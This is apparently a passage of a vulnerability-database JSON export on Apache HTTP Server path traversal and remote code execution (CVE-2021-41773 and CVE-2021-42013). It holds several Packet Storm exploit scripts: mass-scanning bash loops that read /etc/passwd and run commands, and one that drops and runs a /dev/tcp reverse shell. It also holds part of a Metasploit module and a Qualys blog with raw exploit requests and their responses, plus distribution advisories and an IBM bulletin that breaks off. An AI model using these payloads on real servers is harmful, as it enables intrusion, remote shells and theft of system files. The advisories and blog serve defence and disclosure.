xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\"> \n<p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script> \n<p:Arguments/> \n<p:timeout>0</p:timeout> \n<p:b64encoded>true</p:b64encoded> \n</p:ExecuteScript_INPUT> \n</s:Body> \n</s:Envelope> \nENVELOPE \n) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164694/cve_2021_38647_omigod.rb.txt"}, {"lastseen": "2021-10-13T15:48:46", "description": "", "cvss3": {}, "published": "2021-10-13T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "PACKETSTORM:164501", "href": "https://packetstormsecurity.com/files/164501/Apache-HTTP-Server-2.4.50-Path-Traversal-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.50 \n# Tested on: 2.4.50 \n# CVE : CVE-2021-42013 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 == '' ]]; [[ $2 == '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] [COMMAND] \necho ./PoC.sh targets.txt /etc/passwd \necho ./PoC.sh targets.txt /bin/sh id \n \nexit \nfi \nfor host in $(cat $1); do \necho $host \ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done \n \n# PoC.sh targets.txt /etc/passwd \n# PoC.sh targets.txt /bin/sh whoami \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/164501/apache2450-traversalexec.txt"}, {"lastseen": "2021-10-25T17:32:30", "description": "", "cvss3": {}, "published": "2021-10-24T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-24T00:00:00", "id": "PACKETSTORM:164609", "href": "https://packetstormsecurity.com/files/164609/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) \n# Credits: Ash Daulton & cPanel Security Team \n# Date: 24/07/2021 \n# Exploit Author: TheLastVvV.com \n# Vendor Homepage: https://apache.org/ \n# Version: Apache 2.4.50 with CGI enable \n# Tested on : Debian 5.10.28 \n# CVE : CVE-2021-42013 \n \n#!/bin/bash \n \necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' \nif [ $# -eq 0 ] \nthen \necho \"try: ./$0 http://ip:port LHOST LPORT\" \nexit 1 \nfi \ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\" \n \n#usage chmod -x CVE-2021-42013.sh \n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164609/apache2450-exec.txt"}, {"lastseen": "2021-10-06T17:18:36", "description": "", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.49 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "PACKETSTORM:164418", "href": "https://packetstormsecurity.com/files/164418/Apache-HTTP-Server-2.4.49-Path-Traversal.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.49 \n# Tested on: 2.4.49 \n# CVE : CVE-2021-41773 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] \necho ./PoC.sh targets.txt /etc/passwd \nexit \nfi \nfor host in $(cat $1); do \ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/164418/apache2449-traversal.txt"}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution (CVE-2021-42013). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T19:12:12", "type": "mageia", "title": "Updated apache packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T19:12:12", "id": "MGASA-2021-0470", "href": "https://advisories.mageia.org/MGASA-2021-0470.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-03-19T02:05:50", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "debiancve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T09:15:00", "id": "DEBIANCVE:CVE-2021-41773", "href": "https://security-tracker.debian.org/tracker/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-19T02:05:50", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "debiancve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:15:00", "id": "DEBIANCVE:CVE-2021-42013", "href": "https://security-tracker.debian.org/tracker/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-17T15:21:18", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:15:00", "type": "debiancve", "title": "CVE-2021-31807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2021-06-08T20:15:00", "id": "DEBIANCVE:CVE-2021-31807", "href": "https://security-tracker.debian.org/tracker/CVE-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-12-17T15:21:18", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-27T13:15:00", "type": "debiancve", "title": "CVE-2021-31806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-05-27T13:15:00", "id": "DEBIANCVE:CVE-2021-31806", "href": "https://security-tracker.debian.org/tracker/CVE-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "qualysblog": [{"lastseen": "2021-11-26T18:36:54", "description": "On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted \u201cthe issue is known to be exploited in the wild\u201d and later it was identified that the vulnerability can be abused to perform remote code execution. For exploiting both the vulnerabilities Apache HTTP server must be running in non-default configuration.\n\nAs the vulnerabilities are configuration dependent, checking the version of Apache web server is not enough to identify vulnerable servers. With both the CVEs being actively exploited, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150372, 150373, 150374** which sends specially crafted HTTP request to the target server to determine if it is exploitable. Once successfully detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Sever 2.4.51 or greater.\n\n### About CVE-2021-41773\n\nAccording to **CVE-2021-41773**, Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks.\n\n#### Path Traversal Analysis\n\nThe path traversal vulnerability was introduced due to the new code change added for path normalization i.e., for URL paths to remove unwanted or dangerous parts from the pathname, but it was inadequate to detect different techniques of encoding the path traversal characters "dot-dot-slash (../)"\n\nTo prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as `%2e`, the logic fails to recognize `%2e` as dot thereby not decoding it, this converts the characters `../` to `.%2e/` and bypasses the check.\n\nAlong with Path traversal check bypass, for an Apache HTTP server to be vulnerable, the HTTP Server configuration should either contain the [directory directive](<https://httpd.apache.org/docs/2.4/mod/core.html#directory>) for entire server\u2019s filesystem as `Require all granted` or the directory directive should be completely missing from the configuration file.\n\n##### Vulnerable Configuration:\n \n \n <Directory />\n Require all granted\n </Directory>\n \n\nTherefore, bypassing the dot-dot check as `.%2e` and chaining it with misconfigured directory directive allows an attacker to read arbitrary files such as `passwd` from the vulnerable server file system.\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 08:13:02 GMT\n Server: Apache/2.4.49 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\nPlease note that the default configuration of Apache HTTP server has the entire filesystem directory directive configured as `Require all denied` and hence is not vulnerable.\n\n#### Remote Code Execution Analysis\n\nWhile **CVE-2021-41773** was initially documented as Path traversal and File disclosure vulnerability additional research concluded that the vulnerability can be further exploited to conduct remote code execution when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) module is enabled on the Apache HTTP server, this allows an attacker to leverage the path traversal vulnerability and call any binary on the system using HTTP POST requests.\n\n##### Configuration to enable mod_cgi module:\n \n \n <IfModule !mpm_prefork_module>\n LoadModule cgid_module modules/mod_cgid.so\n </IfModule>\n \n\nBy default the `mod_cgi` module is disabled on Apache HTTP server by commenting the above line in the configuration file. Hence, when mod_cgi is enabled and \u201cRequire all granted\u201d config is applied to the filesystem directory directive then an attacker can remotely execute commands on the Apache server. \n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: */*\n Content-Length: 7\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 09:58:23 GMT\n Server: Apache/2.4.49 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\nLooking at the HTTP POST request for RCE, we can understand `/bin/sh` is the system binary that executes the payload `echo;id` and print the output of `id` command in response.\n\n### About CVE-2021-42013\n\n**CVE-2021-42013** was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n\nThe attack in 2.4.49 initially encoded the second dot (.) to `%2e` and the same was double URL encoded into `%%32%65` for version 2.4.50\n\n##### **Encoding Analysis**\n\nConversion: dot \u2192 `%2e` \u2192 `%%32%65`\n\n * 2 is encoded to %32\n * e is encoded to %65\n * And original `%` left as it is\n\nThus a `dot` is equivalent to `%%32%65` which eventually converts `../` in double URL encode format as `%%32%65%%32%65/`\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:16:51 GMT\n Server: Apache/2.4.50 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 7\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:42:40 GMT\n Server: Apache/2.4.50 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\n### Detecting the Vulnerabilities with Qualys WAS\n\nCustomers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:\n\n * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)\n * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)\n * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)\n\n\nQID 150372 \u2013 Apache HTTP Server Path Traversal (CVE-2021-41773)\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results for QID 150372 in the vulnerability scan report:\n\n\n\n### Solution\n\nOrganizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.5.51 or later version to remediate CVE-2021-41773 & CVE-2021-42013, more information can be referred at [Apache Security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nFor maintaining best security practices, Qualys also advises users to ensure the following:\n\n * `mod_cgi` module is disabled by default unless the business requires it.\n * filesystem directory directive to be updated with `Require all denied` as show below:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\n### Credits\n\n**Apache Security advisory:**\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n**CVE Details:**\n\n<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \n<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>\n\n**Credits for the vulnerability discovery go to:**\n\n * Ash Daulton along with the cPanel Security Team\n * Juan Escobar from Dreamlab Technologies\n * Fernando Mu\u00f1oz from NULL Life CTF Team\n * Shungo Kumasaka and Nattapon Jongcharoen\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1445376079548624899>\n * <https://twitter.com/hackerfantastic/status/1445529822071967745>\n * <https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>\n\n### Contributor\n\n**Jyoti Raval**, Lead Web Application Security Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T06:22:22", "type": "qualysblog", "title": "Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T06:22:22", "id": "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-28T01:50:15", "description": "## Summary\n\nIBM Rational Build Forge version 8.0.x is affected by CVE-2021-42013\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>) \n** DESCRIPTION: **Apache HTTP Server could allow a remote attacker to execute arbitrary code on the system caused by a path traversal vulnerability related to an incomplete fix for CVE-2021-41773 when mod_cgi is enabled. By uploading a file and setting permissions, an attacker could exploit this vulnerability to execute arbitrary code on the system with Apache user privileges. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/210764](<https://exchange.xforce.ibmcloud.com/vulnerabilities/210764>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nBuild Forge| 8.0 - 8.0.0.20 \n \n\n\n## Remediation/Fixes\n\nYou must download the fix pack specified in the following table and apply it. \n\n**Affected Supporting Product(s)**\n\n| \n\n**Remediation/Fix** \n \n---|--- \n \nIBM Rational Build Forge 8.0 to 8.0.0.20\n\n| \n\n[Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.21&source=SAR> \"Download\" ) IBM Rational Build Forge 8.0.0.21.\n\nThe fix includes Apache-HTTP-Server-2.4.52 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-17T18:38:24", "type": "ibm", "title": "Security Bulletin: IBM Rational Build Forge 8.0.x is affected by Apache HTTP Server version used in it. (CVE-2021-42013)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-17T18:38:24", "id": "B0C070EA4747AEFBB7DD852AD2FEB1C85461D6FC3CC95192FD2B7703C8D3DCB2", "href": "https://www.ibm.com/support/pages/node/6541330", "cvss": 